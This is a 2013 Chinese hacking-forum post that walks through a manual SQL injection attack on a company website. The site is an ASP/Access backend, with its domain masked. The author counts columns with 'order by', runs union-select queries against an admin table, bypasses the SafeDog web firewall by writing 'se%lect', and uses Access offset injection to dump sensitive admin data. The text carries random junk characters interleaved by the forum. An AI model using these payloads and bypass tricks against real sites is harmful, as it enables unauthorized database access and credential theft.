找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2091|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。1 B$ B8 B- k/ b: O

& V: d8 |  I7 B' @- l. n; v6 {$ q) Z; o/ y/ n: q, H
顺手加个admin
; B1 x" K4 D. p  L
- a4 }% U) f* a8 a
7 I, u; c9 E0 y6 {9 w8 T( q默认后台。
! o, [) Q* O; C% ^1 i3 X回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
/ \4 X3 L. o. P3 D8 s( `, w+ N; v. U" m
, _1 A% g8 O7 X* q4 G
+ @5 L0 |, x, n) {+ m
所以就不用御剑扫了,待会直接封IP。
8 E7 Q3 f/ }8 \ 0 |2 y+ ]+ j8 t' D1 |( S
用order by语句判断是否存在注入。
8 D: a/ h8 o' ?6 k4 ~! @$ Yhttp://www.xxx.com /product_show.asp?id=997 order by 1
8 N, X$ e4 D# d5 ]& Ohttp://www.xxx.com /product_show.asp?id=997 order by 100
, K5 S/ s" w2 k( G/ f# K8 X3 [4 @现在存在注入,经测试后发现是9个字段。
* G' ^9 S: t5 n; X# g8 b/ } ! ^5 d' [: o9 ]3 Z
接下来进行联合查询,猜是否存在admin表。  Y* t' m$ f' D+ s0 K$ @" I8 @
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​5 @* V3 e/ S9 c

4 T4 I! L; L8 [/ V7 x8 Z6 L7 m' z4 [. P/ J/ v1 R
1 U4 E9 x3 s. q
在select中间加个%,se%lect绕过安全狗。) @6 r1 P" B/ ]& f8 a5 c9 @

& K: s$ Z7 X6 M0 ?
' v* k0 v! H7 `( G& l发现存在admin表,然后开始手工猜常用的字段。
( X# Y7 [" @& }" @/ o纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。$ b  n: K1 N$ V$ _
8 W6 x9 W- T' z
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。" n! b. a3 |6 @) I
( M: V( l# k* B- Q/ J% p
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。  x0 ^% O8 f& U( f& z3 S( c" [1 N
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin3 ]4 D8 u7 f- Z+ M# V. g0 Z
好了,敏感内容出显了。​- ?1 F  y4 K/ _5 o8 f! t
# U! I. d& B" e/ I
0 I" ?* w' C$ w/ m  `
9 ~* v6 a6 Y& e$ K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表